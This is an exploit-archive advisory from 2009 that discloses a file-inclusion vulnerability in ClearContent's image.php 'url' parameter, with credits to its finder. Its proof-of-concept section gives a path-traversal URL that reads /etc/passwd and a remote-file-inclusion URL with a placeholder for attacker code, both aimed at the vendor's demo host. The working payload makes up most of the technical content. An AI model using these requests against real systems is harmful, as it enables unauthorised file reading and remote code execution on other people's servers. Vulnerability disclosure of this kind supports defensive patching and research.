[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : ClearContent (image.php url) RFI/LFI Vulnerability
# Published : 2009-07-09
# Author : MizoZ
# Previous Title : Glossword <= 1.8.11 Arbitrary Uninstall / Install Vulnerability
# Next Title : Mlffat 2.2 Remote Blind SQL Injection Exploit


----------------------------------------------------------------------------------------------------

  Name : ClearContent
  Site : http://www.allisclear.com/

  Demo : http://demo.allisclear.com/

----------------------------------------------------------------------------------------------------

 
  Found By : MizoZ [EvilWay Team]

  Made in  : Morocco
  Contact  : mizozx[at]gmail[dot]com
  Greetz   : Moudi , Zuka , All friends


----------------------------------------------------------------------------------------------------


  P0c:
 
    LFI: http://demo.allisclear.com/image.php?url=../../../../../../../../../../etc/passwd
    RFI: http://demo.allisclear.com/image.php?url=[EVIL_CODE]???


 RFI needs register_globals=on;

----------------------------------------------------------------------------------------------------

# www.Syue.com [2009-07-09]